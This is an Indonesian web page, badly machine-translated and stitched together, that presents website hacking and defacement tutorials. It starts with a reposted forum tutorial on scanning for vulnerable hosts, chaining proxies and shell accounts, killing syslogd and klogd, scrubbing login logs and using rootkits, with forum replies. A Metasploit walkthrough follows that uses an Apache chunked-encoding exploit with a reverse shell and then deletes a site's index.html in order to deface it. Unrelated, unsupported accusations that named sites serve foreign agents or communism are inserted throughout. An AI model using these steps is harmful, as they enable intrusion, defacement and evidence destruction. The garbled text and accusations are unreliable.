Hack dan deface website orang trik jitu rusak web orang lain

Cara menggores J Website? Forum> Umum GSO> GSO Tutorials quicksilk 6 April 2006, 09:02 Tutorial ini akan dirobohkan ke dalam 3 bagian utama, yaitu sebagai berikut: 1. Mencari Vuln Alam. 2. Dalam Persiapan. 3. Anda meliputi Trek

Itu benar-benar sangat mudah, dan saya akan menunjukkan bagaimana mudahnya.

Aminah Tangerang !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!1

1. Mencari Vuln Alam Bagian ini harus lebih dirobohkan menjadi dua catigories naskah kiddies: orang yang bersih untuk memindai host yang vuln tertentu dan memanfaatkan orang yang mencari situs tertentu untuk memanfaatkan. Yang Anda lihat alldas yang pertama saja, mereka memindai ribuan situs tertentu untuk memanfaatkan. Mereka tidak peduli siapa yang mereka hack, siapapun akan lakukan. Mereka tidak menetapkan target dan tidak jauh dari tujuan. Menurut pendapat saya

orang-orang ini harus memiliki salah satu penyebab di balik apa yang mereka lakukan, yaitu. "Saya pastikan orang tetap up-to-date dengan keamanan, aku adalah utusan" atau "Aku menyebarkan pesan politik, saya menggunakan defacments untuk mendapatkan perhatian media. Orang yang mencoreng untuk terkenal atau untuk menunjukkan keahlian mereka harus tumbuh dan relize ada cara yang lebih baik mengenai hal ini terjadi (bahwa saya tidak mendukung orang lain dengan alasan eter). Anyways, dua jenis dan apa yang perlu anda ketahui tentang mereka:

Sepintas professional secara halus dengan permainan kata kata situs ini menanamkan ajaran komunisme dengan menghancurkan budaya indonesia melalui forumnya sepintas baik tapi ini milik sebuah rezim !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!111

Scanning Script Kiddie: Anda perlu tahu apa tanda-tanda dari lubang itu, ia adalah layanan? J OS tertentu? J CGI file? Bagaimana anda dapat mengetahui apakah mereka vuln? Versi (s) adalah vuln? Anda harus mengetahui cara mencari bersih untuk mencari target yang sedang menjalankan apa yang vuln. Gunakan altavista.com atau google.com untuk berbasis web exploits. Menggunakan skrip untuk memindai rentang ip untuk beberapa port yang menjalankan vuln layanan. Atau menggunakan netcraft.com untuk mengetahui jenis server mereka berjalan dan apa tambahan itu berjalan (frontpage, php, dsb.) Nmap dan port Scanners membolehkan cepat memindai ribuan ips untuk buka port. Ini adalah orang-orang teknik favorate guys Anda lihat dengan massa di hacks alldas.

Kaskus.us situs ini pemilik Negara Timor Leste dan Agen Rahasia Singapura di Tangerang !!!!!!!!!!!!!!!!!!!!!11

Situs tertarget Script Kiddie: Lagi terhormat maka script kiddies yang lama situs hack apapun. Langkah utama di sini adalah mengumpulkan sebanyak mungkin informasi tentang situs mungkin. Mengetahui apa yang mereka menjalankan OS di netcraft atau menggunakan: telnet www.site.com 80 kemudian GET / HTTP/1.1 Temukan apa layanan yang mereka jalankan dengan melakukan port scan. Mengetahui secara khusus pada pelayanan telnetting kepada mereka. Menemukan script cgi, atau file lainnya yang dapat memungkinkan akses ke server jika dieksploitasi dengan memeriksa / cgi / cgi-bin dan browsing di seluruh situs (ingat untuk menelusuri indeks)

Situs ini secara halus milik sebuah stasiun televise yang merupakan agen Singapura di tangerang !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!11

Lautanindonesia.com

Tidak begitu sulit untuk mendapat info itu? Mungkin memerlukan waktu sebentar, tetapi melalui situs lambat dan mendapatkan semua informasi yang Anda dapat.

2. Dalam Persiapan Setelah kita mendapatkan informasi di situs kami dapat menemukan memanfaatkan (s) yang dapat kita gunakan untuk mendapatkan akses. Jika kamu seorang pemindaian script kiddie Anda akan tahu memanfaatkan waktu ke depan. Beberapa yang besar untuk mencari tempat yang exploits Keamanan Fokus dan packetstorm. Setelah Anda mendapatkan memanfaatkan periksa dan pastikan bahwa untuk memanfaatkan adalah versi yang sama seperti layanan, OS, script, dll. Exploits terutama datang dalam dua bahasa, yang digunakan adalah yang paling C dan perl. Perl script akan berakhir di. Pl atau. Cgi, sedangkan C akan diakhiri. C Untuk mengkompilasi file C (pada sistem * nix) melakukan gcc-o exploit12 kemudian file.c: Untuk ./exploit12 perl lakukan: chmod 700 file . pl (tidak diperlukan) maka: perl file.pl. Jika tidak mungkin sebuah skrip yang sangat sederhana memanfaatkan, atau hanya teori kemungkinan memanfaatkan. Just alittle melakukan penelitian ke dalam cara menggunakannya. Satu hal yang perlu memeriksa weither adalah dengan memanfaatkan adalah jauh atau lokal. Jika lokal Anda harus memiliki account atau akses fisik ke komputer. Jika sudah jauh Anda dapat melakukannya melalui jaringan (internet).

Jangan hanya pergi kompilasi exploits Namun, ada satu hal penting lagi yang perlu Anda ketahui

3. Anda meliputi Trek Maka oleh sekarang anda mendapatkan info yang di-host inorder menemukan memanfaatkan yang akan memungkinkan Anda untuk mendapatkan akses. Jadi mengapa tidak melakukannya? Masalahnya meliputi Anda dengan lagu yang tidak sulit, bukan yang tidak terduga. Anda hanya karena dibunuh dengan sys log tidak berarti bahwa mereka tidak memiliki logger atau IDS berjalan lain. (bahkan pada kotak yang lain). Karena kebanyakan script kiddies tidak tahu keterampilan admin mereka menargetkan mereka tidak memiliki cara untuk mengetahui jika mereka memiliki tambahan logger atau apa. Sebaliknya script kiddie menjadikannya sangat keras (samping mustahil) untuk admin untuk melacak mereka bawah. Banyak menggunakan stolden ISP atau kedua dimulai dengan account, bahkan jika

mereka mendapatkan dilacak mereka tidak akan tertangkap. Jika Anda tidak memiliki luxery ini maka anda harus menggunakan beberapa wingates, shell account, atau trojans ke mental yang. Menghubungkan mereka bersama-sama akan membuat sangat sulit bagi seseorang untuk melacak bawah Anda. Log pada wingates kerang dan kemungkinan besar akan terhapus seperti setelah 2-7 hari. Yaitu jika log disimpan di semua. Cukup sulit untuk mendapatkan bahkan satu ahold admin dalam satu minggu, apalagi lebih pelacakan script kiddie bawah untuk selanjutnya wingate atau shell dan kemudian mendapatkan ahold itu admin sebelum semua log dari setiap akan terhapus. Dan ini jarang untuk melihat bahkan admin ke sebuah serangan, bahkan yang lebih kecil persen akan secara aktif mencari penyerang sama sekali dan hanya akan aman dan mereka kotak itu pernah lupa happend. Untuk kepentingan arugment memungkinkan hanya mengatakan jika Anda menggunakan wingates dan kerang, tidak melakukan apa-apa untuk piss off admin terlalu banyak (yang akan mereka untuk panggilan authoritizes atau Anda mencoba untuk melacak bawah) dan Anda menghapus log, Anda akan aman . Jadi bagaimana Anda melakukannya?

Kami akan terus ini sangat pendek dan terlalu titik, sehingga kami akan perlu untuk mendapatkan sedikit wingates. Wingates oleh alam cenderung untuk mengubah IP atau shutdown sepanjang waktu, jadi Anda memerlukan sebuah Diperbaharui daftar atau program untuk memindai bersih untuk mereka. Anda bisa mendapatkan daftar wingates yang baik di http://www.cyberarmy.com/lists/wingate/ Diperbaharui dan Anda juga bisa mendapatkan sebuah program yang disebut winscan sana. Sekarang mari kita katakan, kita memiliki 3 wingates:

212.96.195.33 Port 23 202.134.244.215 port 1080 203.87.131.9 port 23

untuk menggunakannya kita pergi ke telnet dan menghubungkan mereka pada port 23. kita harus mendapatkan respon seperti ini:

CSM Proxy Server>

untuk menghubungkan ke wingate berikutnya kita ketikkan di dalamnya dari iport

CSM Proxy Server> 202.134.244.215:1080 Jika Anda mendapatkan pesan kesalahan sangat mungkin bahwa proxy Anda mencoba untuk menyambung ke bukan atas, atau bahwa Anda perlu login ke proxy. Jika semuanya berjalan dengan baik Anda akan mendapatkan 3 chained bersama dan memiliki sebuah shell account yang Anda dapat menyambung ke. Setelah anda di shell account yang dapat membuat link kerang bersama oleh:

[j00 @ server j00] $ ssh 212.23.53.74

Anda bisa mendapatkan shell gratis untuk bekerja sampai dengan Anda mendapatkan beberapa hacked kerang, di sini adalah daftar shell account gratis. Dan jangan lupa untuk mendaftar dengan informasi palsu dan dari wingate jika memungkinkan.

SDF (freeshell.org) - http://sdf.lonestar.org GREX (cyberspace.org) - http://www.grex.org NYX - http://www.nxy.net ShellYeah - http://www.shellyeah.org HOBBITON.org - http://www.hobbiton.org FreeShells - http://www.freeshells.net DucTape - http://www.ductape.net Free.Net.Pl (Polish server) - http://www.free.net.pl XOX.pl (Polish server) - http://www.xox.pl IProtection - http://www.iprotection.com CORONUS - http://www.coronus.com ODD.org - http://www.odd.org Monyet kecil - http://www.marmoset.net flame.org - http://www.flame.org freeshells - http://freeshells.net.pk LinuxShell - http://www.linuxshell.org takiweb - http://www.takiweb.com Freeport - http://freeport.xenos.net BSDSHELL - http://free.bsdshell.net ROOTshell.be - http://www.rootshell.be shellasylum.com - http://www.shellasylum.com Daforest - http://www.daforest.org FreedomShell.com - http://www.freedomshell.com LuxAdmin - http://www.luxadmin.org shellweb - http://shellweb.net blekko - http://blekko.net

sekali Anda mendapatkan terakhir pada shell anda dapat mengkompilasi memanfaatkan, dan Anda harus aman dari dilacak. Tetapi mari kita akan lebih yakin dan menghapus bukti-bukti yang kita ada disana.

Alright, ada beberapa hal di server pihak bahwa semua skrip kiddies harus sadar. Kebanyakan ini adalah log yang Anda harus menghapus atau mengedit. The real script kiddies mungkin bahkan menggunakan rootkit untuk menghapus automaticly log. Meskipun memungkinkan anda tidak menganggap bahwa lame. Ada dua utama logging daemon yang akan mencakup, klogd yang log kernel, dan syslogd yang merupakan sistem log. Langkah pertama adalah untuk membunuh daemon, sehingga mereka tidak masuk lagi tindakan Anda.

[root @ hacked root] # ps-def | grep syslogd [root @ hacked root] # kill -9 pid_of_syslogd

di baris pertama kita menemukan pid syslogd yang di kedua kita yang membunuh daemon. Anda juga dapat menggunakan / etc / syslog.pid untuk mencari pid dari syslogd.

[root @ hacked root] # ps-def | grep klogd [root @ hacked root] # kill -9 pid_of_klogd

Sama terjadi di sini dengan klogd sebagai kita lakukan dengan syslogd.

sekarang yang dibunuh default logger script kiddie perlu menghapus themself dari log. Untuk mencari dimana syslogd puts it's log memeriksa / etc / syslog.conf file. Tentu saja jika anda tidak peduli jika Anda tahu admin ada disana, anda dapat menghapus log sepenuhnya. Lets say you are the lamest dari script kiddies, yang defacer, admin akan tahu bahwa kotak telah comprimised sejak defaced website ini. Jadi tidak ada titik Menambahkan log, mereka hanya menghapusnya. Alasan kami Menambahkan mereka sehingga admin tidak akan tahu bahkan telah istirahat di accurd. Saya akan lebih lanjut alasan utama orang istirahat ke kotak:

Untuk menghapus situs web. - Ini benar-benar pincang, karena tidak memiliki titik dan hanya kerusakan sistem.

Untuk berdengus password untuk jaringan lainnya. - Ada program yang memungkinkan Anda untuk berdengus lainnya dari dan password dikirim ke kotak. Jika kotak ini adalah pada jaringan ethernet maka anda bahkan bisa menghirup paket (yang berisi password) yang mentakdirkan ke dalam kotak yang segmen.

Untuk me-mount serangan DDoS. - Lame alasan lain, admin memiliki tingkat kemungkinan noticing yang comprimised dia setelah Anda mulai mengirim ratusan MBS melalui sambungan.

Untuk me-mount serangan lain di kotak. - Ini dan sniffing adalah yang paling umum digunakan, tidak pincang, alasan untuk memanfaatkan sesuatu. Karena Anda sekarang bagaimana rootshell anda dapat me-mount Anda serangan dari kotak ini, bukan yang buruk sekali freeshells. Dan Anda sekarang memiliki kontrol atas logging di shell.

Untuk mendapatkan info sensitif. - Beberapa corperate kotak memiliki banyak info berharga pada mereka. Database kartu kredit, kode sumber untuk perangkat

lunak, user / password daftar, dan lainnya atas info rahasia bahwa hacker mungkin ingin ada.

Untuk belajar dan bersenang-senang. - Banyak orang yang melakukannya untuk menggairahkan dari hacking, dan mendapatkan pengetahuan anda. Saya tidak melihat ini sebagai kejahatan yang mengerikan sebagai defacing. asalkan Anda tidak merusak apapun yang saya tidak berpikir ini sangat buruk. Infact bahkan beberapa orang akan membantu admin patch yang lubang. Walaupun masih ilegal, dan bukan untuk menarik orang dari kotak.

I'll go atas dasar file log: utmp, wtmp, lastlog, dan. Bash_history File-file ini biasanya di / var / log / tapi saya dengar dari mereka yang di / etc / / usr / bin / dan tempat-tempat lain. Karena banyak yang berbeda pada kotak yang terbaik adalah hanya melakukan find /-iname 'utmp' | find /-iname 'wtmp' | find /-iname 'lastlog'. dan juga yang melemparkan cari / usr / / var / dan / etc / direktori untuk log lainnya. Sekarang untuk penjelasan ini 3.

utmp merupakan file log untuk yang ada di sistem, saya pikir anda dapat melihat mengapa hal ini harus ditambahkan log. Karena Anda tidak ingin membiarkan siapapun tahu anda berada di sistem. wtmp log yang login dan logouts serta info lainnya yang akan tetap jauh dari admin. Harus ditambahkan untuk menunjukkan bahwa Anda tidak pernah masuk atau keluar. dan lastlog adalah file yang menyimpan semua catatan login. Shell anda sejarah lain adalah file yang menyimpan log semua perintah yang dikeluarkan, Anda akan terlihat untuk Anda dalam direktori $ HOME dan mengeditnya. Sh_history,. Sejarah, dan. Bash_history merupakan nama umum. Anda hanya perlu menambahkan file log ini, tidak menghapusnya. jika anda menghapusnya akan menjadi seperti memegang tanda besar dari infront admin berkata "Anda telah hacked". Newbie script kiddies sering mencoret kemudian rm-rf / agar aman. Saya akan menghindari hal ini, kecuali jika Anda benar-benar freaking out. Dalam hal ini saya sarankan agar Anda tidak pernah mencoba untuk memanfaatkan sebuah kotak lagi. Cara lain untuk mencari file log adalah menjalankan skrip untuk memeriksa untuk membuka file (secara manual dan kemudian melihat mereka untuk menentukan apakah mereka log) atau dilakukan untuk menemukan sebuah file yang telah editted, perintah ini akan: find /-ctime 0-cetak

Beberapa script populer yang dapat menyembunyikan keberadaan anda dari log termasuk: pertengkaran, jelas dan jubah. Pertengkaran akan menggantikan keberadaan Anda dalam log dengan 0's, jelas akan menghapus log dari keberadaan Anda, dan jubah akan menggantikan keberadaan Anda dengan informasi yang berbeda. acct-bersih adalah berat hanya skrip yang digunakan dalam menghapus account logging dari pengalaman. Paling ada rootkits log pembersihan script, dan setelah itu Anda terinstal log tidak dipelihara you anyways. Jika anda pada log NT adalah di C: \ WinNT \ system32 \ LogFiles \, hanya menghapusnya, nt admin

kemungkinan besar mereka tidak memeriksa atau tidak tahu apa artinya jika mereka akan dihapus.

Satu hal tentang akhir meliputi lagu Anda, saya tidak akan masuk ke dalam detail mengenai hal ini karena akan memerlukan tutorial untuk semua itu sendiri. Aku berbicara tentang rootkits. Apakah rootkits? Mereka yang sangat banyak digunakan alat yang digunakan untuk menutupi trek setelah Anda masuk ke dalam kotak. Mereka akan tinggal tersembunyi painfree dan sangat mudah. Apa yang mereka lakukan adalah mengganti binaries seperti login, id, dan yang tidak menunjukkan keberadaan Anda, lamanya. Mereka akan memungkinkan anda untuk login tanpa password, tanpa log oleh wtmp atau lastlog dan bahkan tanpa sedang dalam / etc / passwd file. Mereka juga membuat perintah seperti id tidak menampilkan proses, sehingga tidak seorangpun yang tahu apa yang anda menjalankan program. Mereka mengirimkan laporan palsu pada netstat, ls, dan w sehingga semuanya terlihat cara biasa, kecuali anda melakukan sesuatu yang hilang. Tapi ada beberapa flaws di rootkits, untuk satu perintah menghasilkan beberapa efek aneh karena biner tidak dilakukan dengan benar. Mereka juga meninggalkan sidik jari (cara untuk memberitahukan bahwa file dari rootkit). Hanya pintar / bagus admin memeriksa rootkits, jadi ini bukan merupakan ancaman terbesar, namun harus dipertimbangkan. Rootkits yang datang dengan LKM (Loadable modul kernel) biasanya yang terbaik karena dapat membuat Anda pretty much totally kelihatan kepada semua orang lain dan kebanyakan admin tidak dapat memberitahu mereka comprimised.

Dalam tutorial ini writting dicampur perasaan saya. Saya tidak mau lagi script kiddies mereka pemindaian ratusan situs untuk selanjutnya mengeksploitasi. Dan saya tidak ingin nama saya di setiap shouts. Saya bukan mau orang berkata "mmm, bahwa defacing crap is pretty lame" terutama ketika orang-orang yang tidak mencari exploits kehidupan sehari-hari hanya untuk mendapatkan nama mereka di situs selama beberapa menit. Saya merasa banyak orang yang belajar, tetapi segala apa yang mereka perlu tahu inorder ke dalam kotak untuk istirahat. Mungkin tutorial ini memotong ke chase alittle dan membantu orang-orang yang melihat bagaimana pengetahuan sederhana dan mudah-mudahan itu membuat mereka melihat bahwa sistem menjadi semakin tidak semua it's hyped up to be. Ianya bukan dengan cara apapun yang lengkap panduan, saya tidak mencakup banyak hal. Saya harap admin menemukan tutorial ini bermanfaat juga, belajar yang tidak peduli apa situs yang Anda jalankan harus selalu tetap di bagian atas dan patch terbaru exploits mereka. Melindungi diri sendiri dengan IDS dan mencoba mencari lubang pada sistem anda sendiri (baik dengan vuln Scanners dan tangan). Juga menyiapkan eksternal kotak login bukan ide buruk. Admin harus juga dilihat alittle bit ke dalam fikiran script kiddie dan pelajari beberapa hal ia .. ini akan membantu Anda menangkap satu jika mereka melanggar ke dalam sistem.

Di satu catatan akhir, defacing adalah pincang. Saya tahu banyak orang yang telah defaced di masa lalu dan menyesali sekarang. Anda akan dilabeli script kiddie dan lamer yang panjang, lama.

Banyak regards dan terima kasih kepada Tanito ...

Courtesy of (P) inoy (H) acking Team stinkefisch 6 April 2006, 12:31 Very nice tut. Thanks very much keep up the good work. Trajik 6 April 2006, 11:51 Not a bad tute. I don't really see the point of it though. Anda tidak benar-benar pergi ke terlalu banyak detail tentang bagaimana yang benar-benar menarik skiddie off satu serangan. , Pada dasarnya anda pergi dari berkata 'Anda memindai host' 'pencarian untuk memanfaatkan' 'rantai beberapa proxy' 'menjalankan memanfaatkan' 'merubah log'. Anda melewati semua itu, dan hanya memberikan beberapa contoh kode aktual dan proses.

Ini adalah lebih umum dari pada "melihat bagaimana mudahnya untuk memiliki situs hacked", yang sebenarnya dari artikel 'bagaimana untuk' untuk skiddies. Saya tidak yakin yang mana yang Anda mencoba untuk menarik dari. Either way, sangat baik pada artikel skiddie metode hacking, sangat buruk 'tutorial'. Misalnya, Anda mengatakan "menghapus log NT, jendela admin tidak akan tahu apa yang mereka berarti untuk dihapus" ... come on, apa saja yang nasihat yang tongue.gif

I enjoyed it though. Keep up the good work. sarkar112 7 April 2006, 12:49 I think ComSec (Kenny L) diposting ini sudah, dan tidak ada pelanggaran, tetapi, saya ada keraguan tentang jika anda penulis yang benar-benar atau tidak.

PS: Kebanyakan dari mereka tidak kerang avalible lagi, saya sarankan VMWare server, menggunakan LiveCD yang memiliki proxy server atau perangkat lunak yang disertakan similer ke puncak gunung, dan saya juga menyarankan Anda tidak akan hitam topi, dan kotak hack lainnya, sebagai gantinya, menetakkan dalam hukum lingkungan, untuk alasan etika, dengan etika intensions.

EDIT: hxxp: / / www.hnc3k.com/howtodeface.htm Tutorial adalah b0iler, silahkan untuk memberikan kredit yang benar-benar penulis kali Anda posting.

BTW: Jika anda posting artikel anda tidak menulis, akan menyadari disclaimer dalam artikel, bahkan jika mereka memiliki disclaimer. Cyberbob

11 April 2006, 03:41 Anda pasti tidak bekerja

http://www.governmentsecurity.org/forum/in...t=0 & # entry59955 EhTi 11 April 2006, 08:24 it's a nice tutorial untuk pemula, namun Anda harus telah diberi kredit dan / atau menyebutkan sumber dari mana you got it. Namun, Anda diberikan kredit ke Quote (quicksilk) Courtesy of (P) inoy (H) acking Team

Sekarang, bagaimana dan embarassing lame is that?

Anda mungkin ingin membaca INI memposting. Quote (Kenny L) mereka harus menyertakan kredit kepada penulis ... dan jika mungkin link kembali ke tempat Anda diperoleh dari tutorial aelphaeis_mangarae 11 April 2006, 10:32 OMFG! TIDAK LAGI!

Berapa kali tuhan telah damn tutorial ini telah ripped off! FFS! kerabit b0iler mungkin itu juga, ini telah kerabit sedikitnya 3 kali pada GovSec sendiri.

3. Ini adalah waktu (dari memori) Saya juga melihat tutorial ini diterbitkan oleh Indonesian Hacker Group.

Tutorial ini adalah yang paling ripped off tutorial di seluruh dunia. Dan hal itu, saya tidak tahu mengapa orang ingin rip it off, it's just plain crap.

EDIT:

Tutorial RIP OFF Pajak # 1:

http://www.governmentsecurity.org/forum/in...topic=11205&hl =

Tutorial RIP OFF Pajak # 2:

http://www.governmentsecurity.org/forum/in...topic=11857&hl =

Dan tentu saja ini posting Tutorial RIP OFF Pajak # 3:

http://www.governmentsecurity.org/forum/in...topic=20232&hl = funtu $ h

11 April 2006, 09:28 Quote (aelphaeis_mangarae @ 11 April 2006, 10:32 PM) * OMFG! TIDAK LAGI!

Berapa kali tuhan telah damn tutorial ini telah ripped off! Tutorial ini adalah yang paling ripped off tutorial di seluruh dunia. Dan hal itu, saya tidak tahu mengapa orang ingin rip it off, it's just plain crap.

Just because it's subject chatches yang semua orang, dan menangkap bahkan terlalu biggrin.gif google sarkar112 11 April 2006, 09:40 Quote (Cyberbob @ 10 April 2006, 11:41 PM) * Anda pasti tidak bekerja

http://www.governmentsecurity

Hack dan deface website orang trik jitu rusak web orang lain

Deface WebServer dengan Metasploit Framework Tool

OK langsung aja yach? Berikut ini saya akan menjelaskan cara kerja tool Metasploit. Dengan tool ini kita akan memperoleh akses ke tingkat sistem pada Apache web server. Memperoleh shell yang memungkinkan kita mengupload file index.html kita sendiri, yang menjadi halaman default dari web server tersebut.

Catatan dibawah ini menunjukkan bagaimana perintah “show exploits” akan dilakukan saat berada pada prompt msf dari Metasploit. Berikut ini daftar exploit yang ada.

msf > show exploits

Metasploit Framework Loaded Exploits====================================Credits Metasploit Framework Credits

afp_loginext AppleFileServer LoginExt PathName Buffer Overflowapache_chunked_win32 Apache Win32 Chunked Encodingblackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflowdistcc_exec DistCC Daemon Command Executionexchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflowfrontpage_fp30reg_chunked Frontpage fp30reg.dll Chunked Encodingia_webmail IA WebMail 3.x Buffer Overflowiis50_nsiislog_post IIS 5.0 nsiislog.dll POST Overflowiis50_printer_overflow IIS 5.0 Printer Buffer Overflowiis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow

Jadi disini kita bisa melihat daftar exploit pada Metasploit (penulis: maaf saya ringkas saja). salah satu yang akan kita gunakan adalah exploit nomor 2 dari atas, yakni: apache_chunked_win32

Sekarang ketik perintah exploit dibawah ini:

msf > use apache_chunked_win32

msf apache_chunked_win32 >

Sebagaimana yang terlihat pada prompt akan berubah menjadi msf apache_chunked_win32> dengan prompt ini kita dapat melihat berbagai opsi exploit jenis ini, silakan ketik perintah dibawah ini:

msf apache_chunked_win32 > show options

Exploit Options===============Exploit: Name Default Description-------- ------ ------- ------------------optional SSL Use SSLrequired RHOST The target addressrequired RPORT 80 The target portTarget: Windows NT/2K Brute Force

msf apache_chunked_win32 >

Sekarang kita balik ke prompt semula, dan daftar opsi yang kita perlu isi seperti remote host IP address target, seperti contoh dibawah ini:

msf apache_chunked_win32 > set RHOST 192.168.1.101RHOST -> 192.168.1.101msf apache_chunked_win32 >

Disini kita dapat melihat berbagai opsi yang kita perlukan sebelum menggunakan exploit ini guna mendapatkan akses tingkat sistem. Dalam kasus ini saya menggunakan perintah berikut untuk melihat apakah opsi payloads bisa digunakan?

msf apache_chunked_win32 > show payloads

Metasploit Framework Usable Payloads====================================win32_bind Windows Bind Shellwin32_bind_dllinject Windows Bind DLL Injectwin32_bind_stg Windows Staged Bind Shellwin32_bind_stg_upexec Windows Staged Bind Upload/Executewin32_bind_vncinject Windows Bind VNC Server DLL Injectwin32_reverse Windows Reverse Shellwin32_reverse_dllinject Windows Reverse DLL Injectwin32_reverse_stg Windows Staged Reverse Shellwin32_reverse_stg_ie Windows Reverse InlineEgg Stagerwin32_reverse_stg_upexec Windows Staged Reverse Upload/Executewin32_reverse_vncinject Windows Reverse VNC Server DLL Injectmsf apache_chunked_win32 >

Ehm! Pilihan yang bagus bukan? Opsi ini merupakan bagian dari Metasploit Framework, yang memungkinkan anda menggunakan “egg” apapun yang anda pilih. Egg disini adalah apapun payload yang akan anda eksekusi pada komputer korban. Pilihan ini merupakan hal umum dalam penggunaan security tool.

Dari apa yang kita lihat diatas ada suatu kelebihan dari opsi yang ada pada kami. Dalam kasus ini kita akan menggunakan win32_reverse payload. Mengapa? baiklah kita menginginkan shell yang bisa kita gunakan untuk mengangkut materi bolak-balik. Tepatnya kita ingin meng-copy file index.html, dan membuat beberapa modifikasi alias Deface. Hanya dengan shell itulah kita dapat melakukannya. Harap diperhatikan bahwa kita perlu memberitahu Framework tersebut bahwa kita ingin opsi payload tersebut. Berikut ini sintak-nya:

msf apache_chunked_win32 > set PAYLOAD win32_reversePAYLOAD -> win32_reversemsf apache_chunked_win32(win32_reverse) >

Jadi kita sekarang telah menentukan payload dan telah menjadi prompt dibelakangnya. Apa selanjutnya? Hmm… kita perlu menentukan IP address untuk menerima reverse shell tersebut. Ingatlah kembali beberapa langkah sebelumnya saat kita mengeset RHOST untuk menentukan mesin korban? Kita juga perlu melakukan hal yang sama untuk menentukan receiving host. Silakan lihat perintahnya dibawah ini:

msf apache_chunked_win32(win32_reverse) > set LHOST 192.168.1.102

LHOST -> 192.168.1.102msf apache_chunked_win32(win32_reverse) >

Sekarang saatnya kita menjalankan exploit. Syntaknya adalah sebagai berikut:

msf apache_chunked_win32(win32_reverse) > exploit 192.168.1.101Starting Reverse Handler.Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 348...Trying to exploit Windows NT using return 0x1c0f1022 with padding of 348...Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 352...Trying to exploit Windows NT using return 0x1c0f1022 with padding of 352...Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 356...Trying to exploit Windows NT using return 0x1c0f1022 with padding of 356...Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 360...Got connection from 192.168.1.101:1031

Microsoft Windows 2000 [Version 5.00.2195](C) Copyright 1985-2000 Microsoft Corp.

C:\Program Files\Apache Group\Apache>

Kita bisa melihat diatas bahwa sekarang kita memiliki command prompt pada direktori Apache itu sendiri. Ada satu opsi yang bisa kita gunakan dalam kasus ini; dimana target seandainya tidak menampilkan sistem operasi apa yang digunakan. Untuk mengetahuinya lakukan hal berikut ini:

msf apache_chunked_win32(win32_reverse) > show targets

Daftar target akan ditampilkan. Yang tinggal anda adalah menentukan target sebagai berikut;

msf apache_chunked_win32(win32_reverse) > set TARGET 1

Yang akan memasukkan target 1 dimana bila sistem operasinya adalah W2K Pro.

Sejauh ini kita telah melumpuhkan Apache web server, dan kita telah memiliki reverse shell. Dengan reverse shell dan akses ke sistem pada mesin guna melakukan manipulasi atau deface. Kita telah mengendalikan remote web server, jadi apa yang harus kita lakukan selanjutnya? Mari kita melakukan “dir” untuk melihat direktori yang ada, seperti contoh dibawah ini:

C:\Program Files\Apache Group\Apache>dir

dir

Volume in drive C has no label.

Volume Serial Number is C8E5-633B

Directory of C:\Program Files\Apache Group\Apache

12/12/2004 10:04a <DIR> .12/12/2004 10:04a <DIR> ..12/15/2000 08:39a 14,583 ABOUT_APACHE01/25/2001 03:12p 4,182 Announcement01/30/2001 12:00a 20,480 Apache.exe01/30/2001 12:00a 323,584 ApacheCore.dll12/12/2004 10:04a <DIR> bin12/12/2004 10:04a <DIR> cgi-bin12/12/2004 10:04a <DIR> conf12/12/2004 10:04a <DIR> htdocs12/12/2004 10:04a <DIR icons12/12/2004 10:04a <DIR> include06/05/2000 01:28p 41,421 KEYS12/12/2004 10:04a <DIR> lib12/12/2004 10:04a <DIR> libexec01/15/2001 10:26a 2,885 LICENSE12/12/2004 10:07a <DIR> logs12/12/2004 10:04a <DIR> modules12/12/2004 10:04a <DIR> proxy12/15/2000 09:04a 4,202 README-WIN.TXT12/12/2004 10:04a <DIR> src11/06/2000 11:57a 1,342 WARNING-WIN.TXT01/29/2001 11:23p 20,480 Win9xConHook.dll01/29/2001 11:24p 40,960 xmlparse.dll01/29/2001 11:24p 73,728 xmltok.dll

11 File(s) 547,847 bytes14 Dir(s) 11,142,889,472 bytes free

C:\Program Files\Apache Group\Apache>

Ehm, baiklah akan saya katakan bagi para “web page defacer” untuk melihat isi direktori htdocs yang menyimpan file index.html. Jadi saya mengetik perintah “cd htdocs” lalu mengetik “dir”.

C:\Program Files\Apache Group\Apache\htdocs>dirdirVolume in drive C has no label.Volume Serial Number is C8E5-633B

Directory of C:\Program Files\Apache Group\Apache\htdocs

<pre>12/18/2004 08:20a <DIR> .12/18/2004 08:20a <DIR> ..07/03/1996 01:18a 2,326 apache_pb.gif01/19/2001 01:39p 1,354 index.html.en12/12/2004 10:04a <DIR> manual04/04/2000 10:26a 743 README.rus3 File(s) 4,423 bytes3 Dir(s) 11,143,004,160 bytes free</pre>

C:\Program Files\Apache Group\Apache\htdocs>

Jadi harap berhati-hati. Apa yang kita perlu lakukan adalah menghapus file tersebut (file index.html), dan setelah melakukannya, masukkan file index.html anda sendiri di tempat tersebut. Bagaimana cara melakukannya? Ada cara terbaik untuk mentrasfer file tersebut, dan teknik yang sering dilakukan oleh para hacker adalah menggunakan TFTP. Para attacker harus memiliki program TFTP server pada komputer mereka, kemudian menggunakan built-in TFTP client pada komputer target untuk melakukan transfer file.

Mari kita melihat kebelakang sebentar. Kita telah memperoleh akses ke shell pada web server melalui exploitasi apache_chunked yang dilakukan dengan Metasploit Framework. Tujuan kita adalah melakukan simulasi bagaimana pelaku deface melakukannya. Sejauh ini kita berada pada jalur yang benar. Saat mendapatkan akses ke web server, kita melihat isi daftar direktori dan melihat ada direktori htdocs yang didalamnya tersimpan file index.html. File inilah yang akan kita modifikasi dengan pesan deface kita sendiri. Dari sini kita akan menggunakan TFTP protokol diatas utuk mendapatkan file index.html yang kemudian akan kita kembalikan ke web server korban. Mari kita melakukannya!

Oops, hati-hati bung, jangan bertindak gegabah ada kemungkinan anda terdeteksi oleh firewall, atau IDS log dsb. Pokoknya hati-hati sajalah. Tapi kebanyakan dari para defacer melakukan aktifitas ini dari warnet dan tidak peduli akibatnya pada warnet yang komputernya mereka sewa.

Perhatikan dibawah ini adalah komputer penyerang yang menghapus file index.html pada web server korban. Hal ini harus dilakukan dengan perintah “del /F”. Para attacker harus menghapus file index.html sebelum mereka menyisipkan file index.html mereka sendiri melalui TFTP.

